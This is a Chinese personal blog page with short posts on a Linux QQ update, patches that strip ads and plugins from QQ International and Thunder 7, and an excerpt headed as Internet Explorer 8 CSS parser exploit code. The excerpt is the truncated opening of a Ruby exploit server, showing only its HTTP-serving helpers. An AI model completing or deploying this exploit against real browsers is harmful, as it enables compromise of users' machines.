话说Linux QQ竟然升级了

今天下午又没出去啊,郁闷。临时有事又出不去了,nngx。从cb上乱逛看到Linux QQ居然升级了,太神奇了。下载下来解压之后发现主版本号是一样的,只是编译号码不一样了。用了一下发现好友竟然能全部刷出来了,难道是人品?

其余的貌似还没有发现有什么新的改进,如果有大的改进的话应该就不是单纯的一个Build编号升级的问题了,连小版本号都没有变化。与那个Windows圈圈不断创造世界纪录的版本号升级速度差距也太大了。目前只有gz的压缩包文件格式,解压之后就可以用了,猛击此处围观猛击此处直接下载smile

Internet Explorer 8 CSS Parser Exploit Code

#!/usr/bin/env ruby 
  
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
  
require 'socket'
   
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
      
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
      
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
   
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
   
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end
Continue Reading

QQ International V1.0(1910) Today Remover [new]

I dislike the patcher generatered by the CodeFusion,so I created this one ,and till now it works fine.click here to download the patch file (better place that file in to the qq installed directory(C:\Program Files\Tencent\QQIntl\Bin as default) and execute the patch).and then u can delete any plugins u want.

Any Problems ,leave a message here,thx. laugh

Ps: Do u know who’s the girl on the patch window?

Thunder (迅雷7)7.1.4.2100 去广告补丁

迅雷的资讯弹窗只需要从设置界面设置一下即可,但是广告却需要vip才能关闭,这里给出一个广告去除补丁。猛击此处下载补丁程序,将程序放入thunder.exe的同级目录下运行即可。如果没有安装迅雷猛击此处下载!需要确保安装的迅雷版本为7.1.4.2100,如果不是该版本请不要运行该补丁程序,网盘下载地址!

PS:

目前我还没有发现怎样可以把迅雷右侧的那个动态界面给去掉,谁知道的或者有什么想法的可以留言,给我点提示。嘎嘎。 smile

Continue Reading